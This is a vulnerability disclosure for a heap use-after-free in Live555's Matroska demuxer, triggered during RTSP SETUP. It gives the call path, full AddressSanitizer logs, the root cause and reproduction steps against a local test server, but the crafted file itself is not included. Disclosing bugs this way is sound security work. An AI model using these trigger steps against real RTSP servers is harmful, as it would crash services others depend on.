(cache)Heap Use-After-Free in Live555 (Matroska Demux during SETUP) 2019.08.16

Document styles

BUG_Author: Heng Zhang

Affected Version: Live555 Streaming Media 2018.9.2 (liveMedia)

Vendor: Live555 GitHub Repository

Software: Live555 Streaming Media / testOnDemandRTSPServer

Vulnerability Files:

liveMedia/MatroskaFile.cpp (MatroskaDemux allocation/usage)

liveMedia/MatroskaFileServerMediaSubsession.cpp (creates per-track sources from the demux)

liveMedia/include/Media.hh (access to Medium::envir() on a freed object)

liveMedia/Media.cpp (MediaLookupTable::remove deletes Medium instances)

(Trigger path) liveMedia/RTSPServer.cpp, liveMedia/OnDemandServerMediaSubsession.cpp, liveMedia/GenericMediaServer.cpp

Description

Use-After-Free when creating a Matroska demuxed track (SETUP)

During RTSP SETUP for a Matroska (.mkv) stream, MatroskaFileServerMediaSubsession::createNewStreamSource() requests a demuxed track from MatroskaDemux. Inside MatroskaDemux::newDemuxedTrackByTrackNumber(), the code constructs a MatroskaDemuxedTrack using envir() from the demux (Medium::envir()).

A crafted test.mkv can trigger a lifetime mismatch where the MatroskaDemux object has been removed from MediaLookupTable and deleted (via MediaLookupTable::remove()), yet a stale pointer to the demux is still used to create a new track. The call to Medium::envir() therefore dereferences a freedMatroskaDemux instance, causing a heap-use-after-free and crash.

Execution Flow Leading to Crash (SETUP path)

RTSPServer::RTSPClientConnection::handleRequestBytes() → RTSPServer::RTSPClientSession::handleCmd_SETUP() → OnDemandServerMediaSubsession::getStreamParameters() → MatroskaFileServerMediaSubsession::createNewStreamSource() → MatroskaDemux::newDemuxedTrackByTrackNumber() →

Medium::envir()(UAF on freed MatroskaDemux)

Crash Evidence (ASan Log)

==12788==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000000028

READ of size 8 at 0x608000000028 thread T0

#0 0x61b96f in Medium::envir() const liveMedia/include/Media.hh:59:43

#1 0x61b96f in MatroskaDemux::newDemuxedTrackByTrackNumber(unsigned) liveMedia/MatroskaFile.cpp:727:56

#2 0x54d1d9 in MatroskaFileServerMediaSubsession::createNewStreamSource(...) liveMedia/MatroskaFileServerMediaSubsession.cpp:53:40

#3 0x60bb69 in OnDemandServerMediaSubsession::getStreamParameters(...) liveMedia/OnDemandServerMediaSubsession.cpp:114:9

#4 0x4ded5f in RTSPServer::RTSPClientSession::handleCmd_SETUP(...) liveMedia/RTSPServer.cpp:1405:17

#5 0x4dade6 in RTSPServer::RTSPClientConnection::handleRequestBytes(int) liveMedia/RTSPServer.cpp:782:19

...

0x608000000028 is located 8 bytes inside of 88-byte region [0x608000000020,0x608000000078)

freed by thread T0 here:

#0 0x4c530d in operator delete(void*)

#1 0x557c74 in MediaLookupTable::remove(char const*) liveMedia/Media.cpp:147:5

previously allocated by thread T0 here:

#0 0x4c4aad in operator new(unsigned long)

#1 0x613545 in MatroskaFile::newDemux() liveMedia/MatroskaFile.cpp:231:26

SUMMARY: AddressSanitizer: heap-use-after-free in Medium::envir() const

Root Cause

The MatroskaDemux object is managed as a Medium and can be deleted by MediaLookupTable::remove() while other code still holds raw pointers to it.

After deletion, subsequent SETUP handling continues to use the freed MatroskaDemux pointer to construct a demuxed track, leading to a dereference of freed memory in Medium::envir().

Impact

Denial of Service: Crash of the RTSP server during SETUP for Matroska streams.

Potential Memory Safety Risk: Use-after-free could, in principle, be exploitable for memory corruption beyond a crash, depending on allocator layout and surrounding heap state.

Proof of Concept

Setup

The following steps detail the setup process for building the Live555 Streaming Media library and the required demo program.

Clone the Live555 source repository:

git clone https://github.com/rgaufman/live555.git

Navigate into the directory and check out the commit corresponding to version 2018.09.02:

git checkout ceeb4f4

Build the Live555 Streaming Media libraries and the associated demo programs. The compilation must be performed with AddressSanitizer (ASAN) enabled (e.g., by including the necessary ASAN flags in the compiler and linker options, such as -fsanitize=address).Ensure that the demo program testOnDemandRTSPServer is successfully compiled and produced as an output binary.

Resources

Place a crafted Matroska file named test.mkv in the working directory used by the matroskaFileTest stream.

Trigger

Start the server:

./testProgs/testOnDemandRTSPServer 8554

From an RTSP client, issue a typical control sequence against the Matroska stream (the crash occurs during SETUP):

DESCRIBE rtsp://127.0.0.1:8554/matroskaFileTest RTSP/1.0

SETUP rtsp://127.0.0.1:8554/matroskaFileTest/track1 RTSP/1.0

PLAY rtsp://127.0.0.1:8554/matroskaFileTest/ RTSP/1.0

With the crafted test.mkv in place, the process terminates with the AddressSanitizer heap-use-after-free report above.

ASAN report

==12788==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000000028 at pc 0x00000061b970 bp 0x7ffe6d681820 sp 0x7ffe6d681818

READ of size 8 at 0x608000000028 thread T0

#0 0x61b96f in Medium::envir() const /home/ubuntu/experiments/live555/liveMedia/include/Media.hh:59:43

#1 0x61b96f in MatroskaDemux::newDemuxedTrackByTrackNumber(unsigned int) /home/ubuntu/experiments/live555/liveMedia/MatroskaFile.cpp:727:56

#2 0x54d1d9 in MatroskaFileServerMediaSubsession::createNewStreamSource(unsigned int, unsigned int&) /home/ubuntu/experiments/live555/liveMedia/MatroskaFileServerMediaSubsession.cpp:53:40

#3 0x60bb69 in OnDemandServerMediaSubsession::getStreamParameters(unsigned int, unsigned int, Port const&, Port const&, int, unsigned char, unsigned char, unsigned int&, unsigned char&, unsigned char&, Port&, Port&, void*&) /home/ubuntu/experiments/live555/liveMedia/OnDemandServerMediaSubsession.cpp:114:9

#4 0x4ded5f in RTSPServer::RTSPClientSession::handleCmd_SETUP(RTSPServer::RTSPClientConnection*, char const*, char const*, char const*) /home/ubuntu/experiments/live555/liveMedia/RTSPServer.cpp:1405:17

#5 0x4dade6 in RTSPServer::RTSPClientConnection::handleRequestBytes(int) /home/ubuntu/experiments/live555/liveMedia/RTSPServer.cpp:782:19

#6 0x4ce3fe in GenericMediaServer::ClientConnection::incomingRequestHandler() /home/ubuntu/experiments/live555/liveMedia/GenericMediaServer.cpp:246:3

#7 0x4ce3fe in GenericMediaServer::ClientConnection::incomingRequestHandler(void*, int) /home/ubuntu/experiments/live555/liveMedia/GenericMediaServer.cpp:239:15

#8 0x66cbe8 in BasicTaskScheduler::SingleStep(unsigned int) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler.cpp:153:7

#9 0x6758fa in BasicTaskScheduler0::doEventLoop(char volatile*) /home/ubuntu/experiments/live555/BasicUsageEnvironment/BasicTaskScheduler0.cpp:80:5

#10 0x4c8b93 in main /home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer.cpp:442:24

#11 0x7fa6a4770082 in __libc_start_main /build/glibc-LcI20x/glibc-2.31/csu/../csu/libc-start.c:308:16

#12 0x41cbfd in _start (/home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer+0x41cbfd)

0x608000000028 is located 8 bytes inside of 88-byte region [0x608000000020,0x608000000078)

freed by thread T0 here:

#0 0x4c530d in operator delete(void*) (/home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer+0x4c530d)

#1 0x557c74 in MediaLookupTable::remove(char const*) /home/ubuntu/experiments/live555/liveMedia/Media.cpp:147:5

previously allocated by thread T0 here:

#0 0x4c4aad in operator new(unsigned long) (/home/ubuntu/experiments/live555/testProgs/testOnDemandRTSPServer+0x4c4aad)

#1 0x613545 in MatroskaFile::newDemux() /home/ubuntu/experiments/live555/liveMedia/MatroskaFile.cpp:231:26

SUMMARY: AddressSanitizer: heap-use-after-free /home/ubuntu/experiments/live555/liveMedia/include/Media.hh:59:43 in Medium::envir() const

Shadow bytes around the buggy address:

0x0c107fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c107fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

=>0x0c107fff8000: fa fa fa fa fd[fd]fd fd fd fd fd fd fd fd fd fa

0x0c107fff8010: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd

0x0c107fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

Shadow byte legend (one shadow byte represents 8 application bytes):

Addressable: 00

Partially addressable: 01 02 03 04 05 06 07

Heap left redzone: fa

Freed heap region: fd

Stack left redzone: f1

Stack mid redzone: f2

Stack right redzone: f3

Stack after return: f5

Stack use after scope: f8

Global redzone: f9

Global init order: f6

Poisoned by user: f7

Container overflow: fc

Array cookie: ac

Intra object redzone: bb

ASan internal: fe

Left alloca redzone: ca

Right alloca redzone: cb

Shadow gap: cc

==12788==ABORTING

Technical Details (Code Locations)

UAF dereference:liveMedia/include/Media.hh:59 (UsageEnvironment& Medium::envir() const)

Where the stale demux pointer is used:liveMedia/MatroskaFile.cpp:724–730 (MatroskaDemux::newDemuxedTrackByTrackNumber)

Demux creation site:liveMedia/MatroskaFile.cpp:230–235 (MatroskaFile::newDemux)

Deletion site:liveMedia/Media.cpp:135–149 (MediaLookupTable::remove deletes Medium)

SETUP call path:RTSPServer::RTSPClientSession::handleCmd_SETUP →OnDemandServerMediaSubsession::getStreamParameters →MatroskaFileServerMediaSubsession::createNewStreamSource →MatroskaDemux::newDemuxedTrackByTrackNumber (UAF)

Vulnerability Class

Type: Use-After-Free (dangling pointer dereference)

Impact: Denial of Service; potential memory corruption

Trigger: Crafted Matroska file (test.mkv) causing premature demux deletion while a stale pointer remains in use

Find Switch to replace Hide replace

Replace with

Find Replace Replace all

words

Copy image
Cut image
Save image

Table of contents

Description
Proof of Concept
Technical Details (Code Locations)
Vulnerability Class